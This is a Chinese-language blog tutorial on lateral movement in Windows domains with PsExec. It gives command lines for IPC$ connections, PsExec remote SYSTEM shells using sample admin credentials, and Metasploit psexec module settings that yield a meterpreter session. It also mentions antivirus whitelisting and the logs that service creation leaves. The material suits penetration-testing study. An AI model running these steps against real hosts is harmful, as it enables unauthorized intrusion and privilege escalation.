横向移动 – PsExec 的使用

psexec 是用于批量维护 windows 主机的强大工具,尤其在域环境下表现出色。由于 psexec 是 windows 提供的工具,杀毒软件通常将其列入白名单。

通过 PsExec,可以在不使用远程桌面(RDP)的情况下,通过命令行与目标机器建立连接,并控制目标机器。

PsExec 是 PsTools 工具包的一部分,下载地址为:https://www.php.cn/link/9092e7bee2d622e7c6c5ef8476928917

利用 PsExec,可以在远程目标主机上执行命令,并将管理员权限提升至 System 权限以运行指定程序。

PsExec 的基本原理是通过管道在远程目标主机上创建一个 psexec 服务,并在本地磁盘生成一个名为“PSEXESVC”的二进制文件,然后通过 psexec 服务运行命令,命令执行完毕后删除服务。

PsExec 的使用

首先,需要获取目标操作系统的交互式 Shell。在建立了 ipc$ 的情况下:

net use 192.168.3.21 /u:goddministrator Admin12345

横向移动 - PsExec 的使用

执行如下命令,获取 System 权限的 Shell:

PsExec.exe -accepteula 192.168.3.21 -s cmd.exe# -accepteula  第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框# -s      以System权限运行远程进程,获得一个System权限的交互式Shell,如果不用这个参数,那么会获得一个administrator权限的shell

横向移动 - PsExec 的使用横向移动 - PsExec 的使用

获得一个 administrator 权限的 shell:

PsExec.exe -accepteula 192.168.3.21 cmd.exe

横向移动 - PsExec 的使用

如果没有建立 ipc$,PsExec 有两个参数可以通过指定的账号和密码进行远程连接:

PsExec.exe 192.168.3.21 -u goddministrator -p Admin12345 cmd.exe# -u  域用户名# -p  密码

横向移动 - PsExec 的使用

使用 PsExec 在远程计算机上执行命令进行回显:

PsExec.exe 192.168.3.21 -u goddministrator -p Admin12345 cmd /c "ipconfig"

横向移动 - PsExec 的使用

PsExec 的注意事项

需要远程系统开启 admin 共享(默认是开启的),原理是基于 IPC 共享,目标需要开放 445 端口和 admin。

在使用 IPC 连接目标系统后,不需要输入账户和密码。

SpeakingPass-打造你的专属雅思口语语料 SpeakingPass-打造你的专属雅思口语语料

使用chatGPT帮你快速备考雅思口语,提升分数

SpeakingPass-打造你的专属雅思口语语料 25 查看详情 SpeakingPass-打造你的专属雅思口语语料

在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 服务。命令执行完后,psexec 服务将被自动删除。由于创建或删除服务时会产生大量的日志,可以在攻击溯源时通过日志反推攻击流程。

使用 PsExec 可以直接获得 System 权限的交互式 Shell(前提目标是 administrator 权限的 shell)。

在域环境测试时发现,非域用户无法利用内存中的票据使用 PsExec 功能,只能依靠账号和密码进行传递。

Metasploit 使用 PsExec 模块

查找有关 psexec 的模块:

search psexec

横向移动 - PsExec 的使用

有两个常用的模块:

exploit/windows/smb/psexecexploit/windows/smb/psexec_psh(Powershell 版本的 psexec)

使用模块:

use exploit/windows/smb/psexecset rhosts 192.168.2.25set smbuser administratorset smbpass Admin12345

横向移动 - PsExec 的使用

运行 exploit,运行脚本会获得一个 meterpreter:

横向移动 - PsExec 的使用

输入 shell,会获得一个 system 权限的 shell:

横向移动 - PsExec 的使用

psexec_psh 模块和 psexec 模块的使用方法相同,二者的区别在于,通过 psexec_psh 模块上传的 payload 是 powershell 版本的。

参考文章:

https://www.php.cn/link/004dbbb73c0e3933d191fa195500d018

以上就是横向移动 – PsExec 的使用的详细内容,更多请关注创想鸟其它相关文章!

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/418265.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2025年11月7日 08:32:00
下一篇 2025年11月7日 08:32:55

相关推荐

发表回复

登录后才能评论
关注微信